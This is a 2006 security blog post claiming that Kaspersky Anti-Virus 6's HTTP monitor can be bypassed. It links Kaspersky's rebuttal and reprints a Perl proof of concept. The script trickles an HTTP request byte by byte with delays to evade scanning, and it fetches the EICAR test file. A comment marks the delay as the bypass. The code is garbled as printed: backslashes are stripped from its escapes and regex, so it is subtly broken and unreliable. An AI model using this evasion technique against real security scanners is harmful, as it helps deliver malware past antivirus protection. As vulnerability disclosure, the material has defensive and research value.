Securityview
Recent news
Recent comments
Poll

    What's your opinion about the actions of DieselScripts?

    See this story if you missed it!


    View Results

    View or give your comment

Alerts
Active Virus Alerts by Kaspersky
  • updated:01 Jan 1970 12:00am UTC

  • If empty no active alerts are available!

Securityview 5 currently online
199 maximum concurrent
275745 total visitors

Kasperskyantivirus broken? No they are not!

Update
See http://forum.kaspersky.com/index.php?s=dde13e274b2e7f67b43fe425ae8a0ecd&showtopic=14734&st=0&p=120857&#entry120857 for a reaction from KAV, it is not broken!

It looks like Kaspersky has made a little error in their HTTP monitor. In Kaspersky antivirus 6 and Kaspersky internet security 6 it is possible to bypass the HTTP virus monitor. This happens because of HTTP parsing errors. john@[removespam]kak-sam.to has made some exploit code available:

This perl script could be run with ActiveState Perl 5.8:

use IO::Socket::INET;
use strict;

my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',
                                  'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,
                               PeerPort => $h_port,
                               Proto    => 'tcp' );
die "socket: $!" unless $s;

sendthem( $s,
          "GET $h_url HTTP/1.1",
          "Host: $h_srv",
          ""
    );
my $doc = read_body( $s, read_headers( $s ) );
syswrite STDOUT,
    'document is < '.$doc.'> len='.length($doc)."n";

sub sendthem {
    my $s = shift;
    my $c = 0;
    foreach( @_ ) {
        my @a = split //, $_;
        ++$c;
        syswrite STDOUT, "query $c: ";
        foreach( @a ) {
            sendone( $s, $_ );
        }
        sendone( $s, "r" );
        sendone( $s, "n" );
    }
}

sub sendone {
    my( $s, $v ) = @_;
    $s->syswrite( $v );
    syswrite STDOUT, $v;
# !!! comment next line to have monitoring working ;)
    select( undef, undef, undef, 0.300 );
}

sub read_headers {
    my( $s ) = @_;
    my( $c, $cl ) = ( 0, 0 );
    for( ;; ) {
        my $l = read_line( $s );
        ++$c;
        syswrite STDOUT, "header $c: $l";
        syswrite STDOUT, "rn";
        last if not $l and $c;
        $cl = $1 if $l =~ /^Content-Length:s+(d+)/;
    }
    $cl;
}

sub read_line {
    my( $s ) = @_;
    my $str = '';
    for( ;; ) {
        my $v = '';
        my $r = $s->sysread( $v, 1 );
        die 'EOF reading headers!' unless $r;
        last if $v eq "n";
        next if $v eq "r";
        $str .= $v;
    }
    return $str;
}

sub read_body {
    my( $s, $cl ) = @_;
    my( $str, $cli ) = ( '', $cl );
    syswrite STDOUT, "reading body  ...n";
    for( ;; ) {
        my $v = '';
        my $r = $s->sysread( $v, 1 );
        last unless $r;
        $str .= $v;
        --$cl if $cli;
        last if not $cl and $cli;
    }
    return $str;
}

This entry was posted on Tuesday, May 23rd, 2006 at 23:15 and is filed under Vulnerables, Windows. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a Reply